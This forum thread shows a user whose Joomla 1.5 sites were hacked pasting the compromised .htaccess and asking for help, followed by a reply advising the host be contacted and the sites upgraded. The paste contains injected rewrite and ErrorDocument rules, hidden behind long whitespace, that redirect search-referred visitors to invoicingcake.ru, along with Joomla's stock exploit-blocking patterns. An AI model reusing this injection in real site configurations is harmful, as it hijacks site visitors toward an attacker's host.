RocketTheme - TOPIC: Most of my 1.5 sites hacked

Welcome Guest! Login

0 items Join Now

KO
Elite Rocketeer
Posts: 681
Thanks: 3

Most of my 1.5 sites hacked

Posted 12 years 7 months ago

Hello,

I know I'm not supposed to ask this here because it is strictly for RT related post but I need some help with security.

It seems that about 13 of my 1.5.26 sites have been attacked some time last night and noticed that when directly accessing the site via browser, the site is okay. However, when trying to access the site via Google search, the link redirects to google's homepage.

The funny thing is that none of my 2.5 sites are affected. Just 1.5 .

Here's a copy of my .htaccess, and it looks pretty whacked. Fortunately I have all backups so still alive but worried about another attack.

Any advice o how to prevent future hacks.

                                                                                                                                                                                                                                                
                                                                                                                        <IfModule mod_rewrite.c>                                                                                                                        
                                                                                                                        RewriteEngine On                                                                                                                        
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|filesearch|yell|openstat|metabot|gigablast|entireweb|amfibi|dmoz|yippy|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|infospace)\.(.*)                                                                                                                        
                                                                                                                        RewriteRule ^(.*)$ http://invoicingcake.ru/VEREIN?8 [R=301,L]                                                                                                                       
                                                                                                                        RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|freenet|arcor|alexana|tiscali|kataweb|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|westaustraliaonline)\.(.*)                                                                                                                     
                                                                                                                        RewriteRule ^(.*)$ http://invoicingcake.ru/VEREIN?8 [R=301,L]                                                                                                                       
                                                                                                                        </IfModule>                                                                                                                     
                                                                                                                                                                                                                                                
 
 
 
 
 
 
##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your sef url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################
##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks
#
#  mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension xml files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension xml files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits
#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)
# RewriteBase /
########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section
AddHandler x-httpd-php5.3 .php .phps
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
                                                                                                                                                                                                                                                
                                                                                                                        ErrorDocument 500 http://invoicingcake.ru/VEREIN?8
ErrorDocument 404 http://invoicingcake.ru/VEREIN?8&nbsp;

#863783

- Nanci Memory
- Preeminent Rocketeer
- Posts: 5763
- Thanks: 3
Re: Most of my 1.5 sites hacked

Posted 12 years 7 months ago
- The first place you should start is with your Host provider. They are experienced with this and have access to your files, can look at dates, errors, etc.
  
  Also look at Joomla.org. However, I must prepare you... looking here is going back in time.
  
  My suggestion, get your sites fixed, up and running, and start looking seriously at upgrade options.
  
  Also check the control panel of your site and see what Joomla has published there. You may have to turn this on from your plugins if you had already turned it off, or set to not show.
  
  I know this isn't wonderful news. But I hope it at least helps you get on your way.
  Nanci
- Mark your threads as Solved. Please, Please, Please!
  Using FIREBUG will save you time and HELP you learn.
  Tips Tricks and Tutorial Links
  Security Tips and Joomla Version Info
  Style Tips and Code Snippets
#863811

Time to create page: 0.062 seconds

Most of my 1.5 sites hacked

Most of my 1.5 sites hacked

Re: Most of my 1.5 sites hacked